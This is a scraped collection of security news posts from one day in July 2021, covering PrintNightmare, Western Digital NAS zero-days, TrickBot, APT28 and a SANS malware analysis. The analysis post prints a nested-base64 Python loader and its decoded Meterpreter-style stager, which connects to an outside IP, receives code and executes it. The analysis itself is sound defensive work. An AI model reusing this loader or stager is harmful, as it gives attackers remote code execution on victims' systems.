PrintNightmare, LinkedIn Leaks, Cyber Legislation, & Beer Bots – Wrap Up – SWN #132

This week in the Security Weekly News: The Revenge of the AI Beer Bots, NIST Software definitions, Printspooler, linkedin leaked out, Cybersecurity legislation, and more along with the show Wrap Ups for this week!

Visit https://www.securityweekly.com/swn for all the latest episodes!

Show Notes: https://securityweekly.com/swn132

The post PrintNightmare, LinkedIn Leaks, Cyber Legislation, & Beer Bots – Wrap Up – SWN #132 appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/printnightmare-linkedin-leaks-cyber-legislation-beer-bots-wrap-up-swn-132/?utm_source=rss&utm_medium=rss&utm_campaign=printnightmare-linkedin-leaks-cyber-legislation-beer-bots-wrap-up-swn-132

TrickBot Spruces Up Its Banking Trojan Module

After focusing almost exclusively on delivering ransomware for the past year, the code changes could indicate that TrickBot is getting back into the bank-fraud game.
Read More

The post TrickBot Spruces Up Its Banking Trojan Module appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/trickbot-spruces-up-its-banking-trojan-module/?utm_source=rss&utm_medium=rss&utm_campaign=trickbot-spruces-up-its-banking-trojan-module

Widespread Brute-Force Attacks Tied to Russia’s APT28

The ongoing attacks are targeting cloud services such as Office 365 to steal passwords and password-spray a vast range of targets, including in U.S. and European governments and military.
Read More

The post Widespread Brute-Force Attacks Tied to Russia’s APT28 appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/widespread-brute-force-attacks-tied-to-russias-apt28/?utm_source=rss&utm_medium=rss&utm_campaign=widespread-brute-force-attacks-tied-to-russias-apt28

Why Healthcare Keeps Falling Prey to Ransomware and Other Cyberattacks

Nate Warfield, CTO of Prevailion and former Microsoft security researcher, discusses the many security challenges and failings plaguing this industry.
Read More

The post Why Healthcare Keeps Falling Prey to Ransomware and Other Cyberattacks appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/why-healthcare-keeps-falling-prey-to-ransomware-and-other-cyberattacks/?utm_source=rss&utm_medium=rss&utm_campaign=why-healthcare-keeps-falling-prey-to-ransomware-and-other-cyberattacks

Another 0-Day Looms for Many Western Digital Users

Some of Western Digital’s MyCloud-based data storage devices. Image: WD.

Countless Western Digital customers saw their MyBook Live network storage drives remotely wiped in the past month thanks to a bug in a product line the company stopped supporting in 2015, as well as a previously unknown zero-day flaw. But there is a similarly serious zero-day flaw present in a much broader range of newer Western Digital MyCloud network storage devices that will remain unfixed for many customers who can’t or won’t upgrade to the latest operating system.

At issue is a remote code execution flaw residing in all Western Digital network attached storage (NAS) devices running MyCloud OS 3, an operating system the company only recently stopped supporting.

Researchers Radek Domanski and Pedro Ribeiro originally planned to present their findings at the Pwn2Own hacking competition in Tokyo last year. But just days before the event Western Digital released MyCloud OS 5, which eliminated the bug they found. That update effectively nullified their chances at competing in Pwn2Own, which requires exploits to work against the latest firmware or software supported by the targeted device.

Nevertheless, in February 2021, the duo published this detailed YouTube video from February, which documents how they discovered a chain of weaknesses that allows an attacker to remotely update a vulnerable device’s firmware with a malicious backdoor — using a low-privileged user account that has a blank password.

The researchers said Western Digital never responded to their reports. In a statement provided to KrebsOnSecurity, Western Digital said it received their report after Pwn2Own Tokyo 2020, but that at the time the vulnerability they reported had already been fixed by the release of My Cloud OS 5.

“The communication that came our way confirmed the research team involved planned to release details of the vulnerability and asked us to contact them with any questions,” Western Digital said. “We didn’t have any questions so we didn’t respond. Since then, we have updated our process and respond to every report in order to avoid any miscommunication like this again. We take reports from the security research community very seriously and conduct investigations as soon as we receive them.”

Western Digital ignored questions about whether the flaw found by Domanski and Ribeiro was ever addressed in OS 3. A statement published on its support site March 12, 2021 says the company will no longer provide further security updates to the MyCloud OS 3 firmware.

“We strongly encourage moving to the My Cloud OS5 firmware,” the statement reads. “If your device is not eligible for upgrade to My Cloud OS 5, we recommend that you upgrade to one of our other My Cloud offerings that support My Cloud OS 5. More information can be found here.” A list of MyCloud devices that can support OS 5 is here.

But according to Domanski, OS 5 is a complete rewrite of Western Digital’s core operating system, and as a result some of the more popular features and functionality built into OS3 are missing.

“It broke a lot of functionality,” Domanski said of OS 5. “So some users might not decide to migrate to OS 5.”

In recognition of this, the researchers have developed and released their own patch that fixes the vulnerabilities they found in OS 3 (the patch needs to be reapplied each time the device is rebooted). Western Digital said it is aware of third parties offering security patches for My Cloud OS 3.

“We have not evaluated any such patches and we are unable to provide any support for such patches,” the company stated.

A snippet from the video showing the researchers uploading their malicious firmware via a remote zero-day flaw in MyCloud OS 3.

Domanski said MyCloud users on OS 3 can virtually eliminate the threat from this attack by simply ensuring that the devices are not set up to be reachable remotely over the Internet. MyCloud devices make it super easy for customers to access their data remotely, but doing so also exposes them to attacks like last month’s that led to the mass-wipe of MyBook Live devices.

“Luckily for many users they don’t expose the interface to the Internet,” he said. “But looking at the number of posts on Western Digital’s support page related to OS3, I can assume the userbase is still considerable. It almost feels like Western Digital without any notice jumped to OS5, leaving all the users without support.”

Dan Goodin at Ars Technica has a fascinating deep dive on the other zero-day flaw that led to the mass attack last month on MyBook Live devices that Western Digital stopped supporting in 2015. In response to Goodin’s report, Western Digital acknowledged that the flaw was enabled by a Western Digital developer who removed code that required a valid user password before allowing factory resets to proceed.

Facing a backlash of angry customers, Western Digital also pledged to provide data recovery services to affected customers starting this month. “MyBook Live customers will also be eligible for a trade-in program so they can upgrade to MyCloud devices,” Goodin wrote. “A spokeswoman said the data recovery service will be free of charge.”

If attackers get around to exploiting this OS 3 bug, Western Digital might soon be paying for data recovery services and trade-ins for a whole lot more customers.

Read More

The post Another 0-Day Looms for Many Western Digital Users appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/another-0-day-looms-for-many-western-digital-users/?utm_source=rss&utm_medium=rss&utm_campaign=another-0-day-looms-for-many-western-digital-users

Barracuda Networks Acquires SKOUT Cybersecurity

Barracuda Networks this week extended the scope of its cybersecurity portfolio by agreeing to acquire SKOUT Cybersecurity. SKOUT’s security operations center (SOC) service and extended detection and response (XDR) software is primarily made available via managed service providers (MSPs). Terms of the acquisition were not disclosed. Neal Bradbury, vice president of MSP strategic partnerships at..

The post Barracuda Networks Acquires SKOUT Cybersecurity appeared first on Security Boulevard.

Read More

The post Barracuda Networks Acquires SKOUT Cybersecurity appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/barracuda-networks-acquires-skout-cybersecurity/?utm_source=rss&utm_medium=rss&utm_campaign=barracuda-networks-acquires-skout-cybersecurity

🔴 LIVE: Security Weekly News #132

This week, Dr. Doug talks: The Revenge of the AI Beer Bots, NIST Software definitions, Printspooler, linkedin leaked out, Cybersecurity legislation, and of course the Show Wrap Ups for this week!

→Full Show Notes: https://securityweekly.com/swn132

→Join the Security Weekly Discord Server: https://discord.gg/pqSwWm4
→Visit our website: https://www.securityweekly.com
→Follow us on Twitter: https://www.twitter.com/securityweekly

The post 🔴 LIVE: Security Weekly News #132 appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/%f0%9f%94%b4-live-security-weekly-news-132/?utm_source=rss&utm_medium=rss&utm_campaign=%25f0%259f%2594%25b4-live-security-weekly-news-132

F Secure Total: Test vs Malware and ID Protection

F Secure Total Evaluation: Malware & Ransomware Test, ID Protection overview. How does this product stack up?

Contact us for business:
https://thepcsecuritychannel.com/contact

Buy the best antivirus, security products with exclusive discounts and support this channel:
https://thepcsecuritychannel.com/buy/

Join our community on Discord:
http://discord.tpsc.tech/​

Don’t forget to like and subscribe for the latest cybersecurity content:
https://www.youtube.com/c/thepcsecuritychannel?sub_confirmation=1

The post F Secure Total: Test vs Malware and ID Protection appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/f-secure-total-test-vs-malware-and-id-protection/?utm_source=rss&utm_medium=rss&utm_campaign=f-secure-total-test-vs-malware-and-id-protection

One Medical: Sorry-not-Sorry for Leaking your Personal Info

Primary care med-tech firm One Medical sent email to countless customers, with hundreds of other customer email addresses visible in the To: field.

The post One Medical: Sorry-not-Sorry for Leaking your Personal Info appeared first on Security Boulevard.

Read More

The post One Medical: Sorry-not-Sorry for Leaking your Personal Info appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/one-medical-sorry-not-sorry-for-leaking-your-personal-info/?utm_source=rss&utm_medium=rss&utm_campaign=one-medical-sorry-not-sorry-for-leaking-your-personal-info

LinkedIn Breach, Bitcoin From Banks, PrintNightmare, & NFC Flaws in ATMs – PSW #701

This week in the Security News: LinkedIn breach exposes user data, Why MTTR is Bad for SecOps, 3 Things Every CISO Wishes You Understood, USA as a Cyber Power, is ignorance bliss for hackers, flaws let you hack an ATM by waving your phone, PrintNightmare, Bitcoins from Banks and more!
Visit https://www.securityweekly.com/psw for all the latest episodes!
Show Notes: https://securityweekly.com/psw701

The post LinkedIn Breach, Bitcoin From Banks, PrintNightmare, & NFC Flaws in ATMs – PSW #701 appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/linkedin-breach-bitcoin-from-banks-printnightmare-nfc-flaws-in-atms-psw-701/?utm_source=rss&utm_medium=rss&utm_campaign=linkedin-breach-bitcoin-from-banks-printnightmare-nfc-flaws-in-atms-psw-701

ISC Stormcast For Friday, July 2nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7568, (Fri, Jul 2nd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post ISC Stormcast For Friday, July 2nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7568, (Fri, Jul 2nd) appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/isc-stormcast-for-friday-july-2nd-2021-https-isc-sans-edu-podcastdetail-htmlid7568-fri-jul-2nd/?utm_source=rss&utm_medium=rss&utm_campaign=isc-stormcast-for-friday-july-2nd-2021-https-isc-sans-edu-podcastdetail-htmlid7568-fri-jul-2nd

Network Security News Summary for Saturday July 3rd, 2021

Special Podcast: Print Spooler Vulnerability (CVE-2021-34527, CVE-2021-1675) Update/Summary #printnightmare

Print Spooler printnightmare Update
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
https://doublepulsar.com/zero-day-for-every-supported-windows-os-version-in-the-wild-printnightmare-b3fdb82f840c
https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/
https://github.com/LaresLLC/CVE-2021-1675

keywords: cve-2021-34527, CVE-2021-1675, print spooler, printnightmare

The post Network Security News Summary for Saturday July 3rd, 2021 appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/network-security-news-summary-for-saturday-july-3rd-2021/?utm_source=rss&utm_medium=rss&utm_campaign=network-security-news-summary-for-saturday-july-3rd-2021

US email hacker gets his “computer trespass” conviction reversed

Court says that we need to “avoid a construction that makes some language mere surplusage.”
Read More

The post US email hacker gets his “computer trespass” conviction reversed appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/us-email-hacker-gets-his-computer-trespass-conviction-reversed/?utm_source=rss&utm_medium=rss&utm_campaign=us-email-hacker-gets-his-computer-trespass-conviction-reversed

CISA Offers New Mitigation for PrintNightmare Bug

CERT urges administrators to disable the Windows Print spooler service in Domain Controllers and systems that don’t print, while Microsoft attempts to clarify RCE flaw with a new CVE assignment.
Read More

The post CISA Offers New Mitigation for PrintNightmare Bug appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/cisa-offers-new-mitigation-for-printnightmare-bug/?utm_source=rss&utm_medium=rss&utm_campaign=cisa-offers-new-mitigation-for-printnightmare-bug

Safer Kids Online – How we can help schools and teachers

Check out all the ways our initiative assists teachers and educational institutions in keeping students safe online, including our special Digital Security Handbook for Teachers, which you can download here
https://backend.saferkidsonline.eset.com/storage/free-downloads/April2021/Digital-Security-Handbook-for-Teachers.pdf

The post Safer Kids Online – How we can help schools and teachers appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/safer-kids-online-how-we-can-help-schools-and-teachers/?utm_source=rss&utm_medium=rss&utm_campaign=safer-kids-online-how-we-can-help-schools-and-teachers

Reducing the Risk of Credential Leakage

Long-term cloud credentials are often scattered throughout source code, on laptops or desktops, on servers, in cloud resources and in other locations. It’s easy to copy them across machines, creating credential sprawl that increases your leakage risk. It’s unnecessary, too, because these types of credentials are only required when non-cloud infrastructure resources need to communicate..

The post Reducing the Risk of Credential Leakage appeared first on Security Boulevard.

Read More

The post Reducing the Risk of Credential Leakage appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/reducing-the-risk-of-credential-leakage/?utm_source=rss&utm_medium=rss&utm_campaign=reducing-the-risk-of-credential-leakage

Can Your Data Protection Software Recover from Modern Ransomware?

Your nightmare has come true. Your organization was just attacked by ransomware. They have crippled your networks, corrupted your Active Directory, encrypted business critical documents, and disabled production databases. Now the recovery clock starts. How quickly can your business return to some sense of normalcy? Do you notify your partners, vendors, customers, the public? Do..

The post Can Your Data Protection Software Recover from Modern Ransomware? appeared first on Security Boulevard.

Read More

The post Can Your Data Protection Software Recover from Modern Ransomware? appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/can-your-data-protection-software-recover-from-modern-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=can-your-data-protection-software-recover-from-modern-ransomware

Privacy Takes a Hit In the High Court

One of the earliest “privacy” laws in the United States is, surprisingly, the Fair Credit Reporting Act. Back during the Nixon Administration, Congress passed a law that gave people the right to see what was on their credit report, to contest inaccuracies on their reports and to ensure that the information on their credit report..

The post Privacy Takes a Hit In the High Court appeared first on Security Boulevard.

Read More

The post Privacy Takes a Hit In the High Court appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/privacy-takes-a-hit-in-the-high-court/?utm_source=rss&utm_medium=rss&utm_campaign=privacy-takes-a-hit-in-the-high-court

“inception.py”… Multiple Base64 Encodings, (Fri, Jul 2nd)

“Inception” is a very nice SF movie in which, if you did not watch it, dreams are implemented in people’s minds to help to get access to sensitive information from their memory. Then, a dream is implemented into another dream, etc… up to five levels[1]! If you are not paying attention to the movie, you can be quickly lost. 

Yesterday, I spotted an interesting malicious Python script. It has a very low VT score (3/58)[2] and is very small:

import base64;exec(base64.b64decode(bytes(‘aW1wb3J0IGJhc2U2NDtleGVjKGJhc2U2NC5iNjRkZWNvZGUoYnl0ZXMoJ2FXMXdiM0owSUdKaGMy
VTJORHRsZUdWaktHSmhjMlUyTkM1aU5qUmtaV052WkdVb1lubDBaWE1vSjFwWWFHeFplV2htV0RKc2RHTkhPWGxrUmpsbVMwTmthVmxZVG14T2Fs
RnVTMU0xYVU1cVVtdGFWMDUyV2tkVmIxZ3hPWEJpV0VKMlkyNVNabGg1WjI1Wk1qbHJXbGRPZWtwNWEzVmFNbFl3V2xjMWFtSXlVbXhqYVdkdVpG
aFNiVXhVWjI1TFUyZHVXVlpqZUdReVNYcFRha0pLVTBVMU1sZFVTakJpUjFKRVpVUmFhVkl5ZUhCVVJXUkxZVWROZVZaVVNrOVJNMmcyV2tWb1Mw
MVdhM3BWV0U1clVqSjRNRmRzUm5kaVYwbDZVMWRrYkZFd1NuZFpiV3hEWlZac1dFNVhOV0ZWTW1RMFZGVk9jazVyVG01aVJFSnFZbTF6TWxFeVpI
SlRiVTQyVFZod2FVMXJOWGxYYkdoU1pGZE5lVTlYY0doTmJGbDNVekJTU21NeVRYbFBWM0JvVFd4WmQxUkhlRTlWUmtWM1pFZGFWazFXU2xSVmJG
WkhWR3QwVW1Jd2NFUlhSVEV4VjFSSk5XUlhTblJXYlhCclVUSmtkbE51Y0ZabFZYaHhVbFJDVFdGclZUQlVSM0JHWlZVNVZGa3pUazVXUlZWNFZH
NXdhbU5GZEZKaU1IQkVWakJ3TlZkc1pFZGphMDV1WWtkNGJGSXdOWE5aTUdoU1RtdE9ibUV3Y0d0U01uZ3dWMnhOTVdWdFNraFdiWGhxVVRKamVG
TXhSbmRqTVVKWlZHcENhbUpzV25GYVJVMHhUVmRLZFZGdGFGcE5iazUyVTI1dk1WTnJjRFZsU0hCTlltdHdjMWRVVGxwaU1EVkVZVE5DV0dWclNt
dFJNakZTVDFkT05VNVliR0ZXTURSNVV6QmtNMk5GVG5WYVJ6bG9Wak5vYzFOVlpEUmlSMHB3WVVkMFRGWklhSHBVTW1SMlUyeHdSR042YkdwbFZG
WTFWMnhrVDAxcmRFaGtNMUpwVWpGYU1WTXdaRkpqUlhSU1kwZDRiRkl4V25GVE1HaDNZekpHV0ZOWVZtRlNNVnB4V1dwSmVHUXlUblJXYm5CcVpW
ZG9jRmRXYUU5aVJUVnhWVmhXV21Gc2EzZFhhMlJYWVcxSmVWVnRlRXhTTVVaM1V6Rk9ORTR3YjNwVVZ6VlFZbXMwTlZNeFJuWlFVMk53VjNwQ1pF
dFRhejBuTENkVlZFWXRPQ2NwS1M1a1pXTnZaR1VvS1NrPScsJ1VURi04JykpLmRlY29kZSgpKQ==’,’UTF-8′)).decode())

When you see this, your reflex is to decode the Base64-encoded data. Probably a simple script, let’s have a look at it:

remnux@remnux:/MalwareZoo/20210702$ base64dump.py inception.py
ID Size Encoded Decoded md5 decoded
— —- ——- ——- ———–
1: 4 exec {.. dfaf38dfe495302d62c3a9cefd4dc593
2: 1384 aW1wb3J0IGJhc2U2 import base64;ex 953edd11c0c0f82534e750ebb8e4dad3
remnux@remnux:/MalwareZoo/20210702$ base64dump.py inception.py -s 2 -d
import base64;exec(base64.b64decode(bytes(‘aW1wb3J0IGJhc2U2NDtleGVjKGJhc2U2NC5iNjRkZWNvZGUoYnl0ZXMoJ1pYaGxZeWhmWDJsdGNH
OXlkRjlmS0NkaVlYTmxOalFuS1M1aU5qUmtaV052WkdVb1gxOXBiWEJ2Y25SZlh5Z25ZMjlrWldOekp5a3VaMlYwWlc1amIyUmxjaWduZFhSbUxU
Z25LU2duWVZjeGQySXpTakJKU0U1MldUSjBiR1JEZURaaVIyeHBURWRLYUdNeVZUSk9RM2g2WkVoS01Wa3pVWE5rUjJ4MFdsRndiV0l6U1dkbFEw
SndZbWxDZVZsWE5XNWFVMmQ0VFVOck5rTm5iREJqYm1zMlEyZHJTbU42TVhwaU1rNXlXbGhSZFdNeU9XcGhNbFl3UzBSSmMyTXlPV3BoTWxZd1RH
eE9VRkV3ZEdaVk1WSlRVbFZHVGt0UmIwcERXRTExV1RJNWRXSnRWbXBrUTJkdlNucFZlVXhxUlRCTWFrVTBUR3BGZVU5VFkzTk5WRVV4VG5wamNF
dFJiMHBEVjBwNVdsZEdja05uYkd4bFIwNXNZMGhSTmtObmEwcGtSMngwV2xNMWVtSkhWbXhqUTJjeFMxRndjMUJZVGpCamJsWnFaRU0xTVdKdVFt
aFpNbk52U25vMVNrcDVlSHBNYmtwc1dUTlpiMDVEYTNCWGVrSmtRMjFST1dONU5YbGFWMDR5UzBkM2NFTnVaRzloVjNoc1NVZDRiR0pwYUd0TFZI
aHpUMmR2U2xwRGN6bGplVFY1V2xkT01rdEhkM1JpUjFaMVMwZFJjRXRSY0d4bFIxWnFTMGh3YzJGWFNYVmFSMVpxWWpJeGQyTnRWbnBqZVdocFdW
aE9iRTVxVVhWWmFsa3dXa2RXYW1JeVVteExSMUZ3UzFONE4wb3pUVzVQYms0NVMxRnZQU2NwV3pCZEtTaz0nLCdVVEYtOCcpKS5kZWNvZGUoKSk=
‘,’UTF-8’)).decode())

Another Base64 chunk of data? Let’s do it again. Finally, the payload was encoded four times! (Thanks to base64dump.py for working smoothly with pipes!)

remnux@remnux:/MalwareZoo/20210702$ base64dump.py inception.py -s 2 -d |
base64dump.py -s 2 -d |
base64dump.py -s 2 -d |
base64dump.py -s 2 -d
import socket,zlib,base64,struct,time
for x in range(10):
try:
s=socket.socket(2,socket.SOCK_STREAM)
s.connect((’52[.]14[.]18[.]129′,11577))
break
except:
time.sleep(5)
l=struct.unpack(‘>I’,s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(zlib.decompress(base64.b64decode(d)),{‘s’:s})

Basically, what we have is this:

remnux@remnux:/MalwareZoo/20210702$ echo “Hello” | base64 | base64 | base64 | base64 -d | base64 -d | base64 -d
Hello

The decoded script is a slightly modified Meterpreter backdoor and the IP address is alive. I connected to it in a sandbox and expected to get some payload but nothing…

Simple technique but it remains very effective to bypass antivirus solutions!

[1] https://visual.ly/community/Infographics/entertainment/5-levels-inception
[2] https://www.virustotal.com/gui/file/5bbde2e0191fac97ecceb6daf05780ae794966cfa0eeeeeda57541e33205a133/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post “inception.py”… Multiple Base64 Encodings, (Fri, Jul 2nd) appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/inception-py-multiple-base64-encodings-fri-jul-2nd/?utm_source=rss&utm_medium=rss&utm_campaign=inception-py-multiple-base64-encodings-fri-jul-2nd

ASB-2021.0123 – ALERT [Win] Microsoft Print Spooler: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT Security Bulletin

ASB-2021.0123
Windows Print Spooler Remote Code Execution Vulnerability
2 July 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: Microsoft Print Spooler
Operating System: Windows
Impact/Access: Administrator Compromise — Existing Account
Execute Arbitrary Code/Commands — Existing Account
Resolution: Mitigation
CVE Names: CVE-2021-34527 CVE-2021-1675
Reference: ASB-2021.0116
ASB-2021.0115

Comment: Vulnerability popularly referred to as PrintNightmare.
POC exploit code has reportedly been released.

OVERVIEW

Microsoft has released an out-of-band critical update to address a
Windows Print Spooler Remote Code Execution Vulnerability.
Microsoft has assigned CVE-2021-34527 to this vulnerability and
acknowledges it has been referred to publicly as PrintNightmare.[1]

This vulnerability has received significant media attention in the past day.
[2] [3] [4] [5]

IMPACT

Microsoft has stated the following:

“Microsoft is aware of and investigating a remote code execution
vulnerability that affects Windows Print Spooler and has assigned
CVE-2021-34527 to this vulnerability. This is an evolving situation
and we will update the CVE as more information is available.

A remote code execution vulnerability exists when the Windows Print
Spooler service improperly performs privileged file operations.
An attacker who successfully exploited this vulnerability could run
arbitrary code with SYSTEM privileges. An attacker could then install
programs; view, change, or delete data; or create new accounts with
full user rights.

An attack must involve an authenticated user calling RpcAddPrinterDriverEx().”
[1]

MITIGATION

Microsoft recommends applying the latest security updates released on June 8
AND determining if the Print Spooler service is running and either disabling it
or disabling inbound remote printing through Group Policy. [1]

Microsoft acknowledges this vulnerability is similar to but distinct from the
recent Print Spooler vulnerability reported as CVE-2021-1675 and addressed by
the June 2021 security updates, and that they are still investigating the issue
and will update the page as more information becomes available. [1]

REFERENCES

[1] Windows Print Spooler Remote Code Execution Vulnerability
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

[2] ‘PrintNightmare’ Stuxnet-style zero-day
https://www.itnews.com.au/news/researchers-accidentally-publish-printnightmare-stuxnet-style-zero-day-566767

[3] Public Windows PrintNightmare 0-day exploit allows domain takeover
https://www.bleepingcomputer.com/news/security/public-windows-printnightmare-0-day-exploit-allows-domain-takeover/

[4] Researchers accidentally release exploit code for new Windows
‘zero-day’ bug PrintNightmare
https://portswigger.net/daily-swig/researchers-accidentally-release-exploit-code-for-new-windows-zero-day-bug-printnightmare

[5] PrintNightmare, Critical Windows Print Spooler Vulnerability
https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability

AusCERT has made every effort to ensure that the information contained
in this document is accurate. However, the decision to use the information
described is the responsibility of each user or organisation. The decision to
follow or act on information or advice contained in this security bulletin is
the responsibility of each user or organisation, and should be considered in
accordance with your organisation’s site policies and procedures. AusCERT
takes no responsibility for consequences which may arise from following or
acting on information or advice contained in this security bulletin.

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYN6fcuNLKJtyKPYoAQh6UA//eRH1nYq6qUaKnuvUnbvR78OWRs0FbaLy
A+yUrt9cljVun2qujErv2XF4JKClaJrwvBg9haLlVcViIt084YjnDpKSf73yhDyw
cDYBrAsmsYa5d9HJTl4rXEHUET4bXQ1C68o7fA9VAbm6WK4uq4RvzwRd5+/12f4G
5bnPxpFTvMyRZ8KsxhUI6IjVsi3bxlz+ZGPYTsM/foGVAAf/prmPPBEUaqiVQxv+
ljRbXZ/5BzxPf+mG9txrmeMBc/cw1t7sZ8Pj5xO3lju8+CNbNjkdIoAAFlna0ayL
cl+6zsjyt+zZ0BtKUoe16ae4i1sJVfqrH6vfW/g0YmCAhMr02LCgCtsy0/i9L8rx
alWuK4eNRCkHt3LrM8NhF7zu4YNDWMxMaiZ96wVh7j7rUQ+FeFSTcc5TkaaduqjR
jvI8paNUUmo/kL73rG59YhZ/1q/Nx233BAirze06ht7aY7xJOSuUR8y6eGAnBk++
juonwpYXsV/EBjxlHVqMC6rv2nSxqdnajeN85W5Ntefutv/zZuFgnQBkXmUl20Or
tCmtKoEu3W0BZvBI/8X+N4UVtKCQYpVJDGHA1yIgKUkrXhkuLG5Wj4rFX1VfZ6Fb
xgsuTPhe8Nc1779dJpYER0bkG+eiXayglGJ0Y95ilf0kAlUer55B/silhtdBg2Wz
oAoUPQ3/3Fs=
=RRT5
—–END PGP SIGNATURE—–

Read More

The post ASB-2021.0123 – ALERT [Win] Microsoft Print Spooler: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2021/07/02/asb-2021-0123-alert-win-microsoft-print-spooler-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=asb-2021-0123-alert-win-microsoft-print-spooler-multiple-vulnerabilities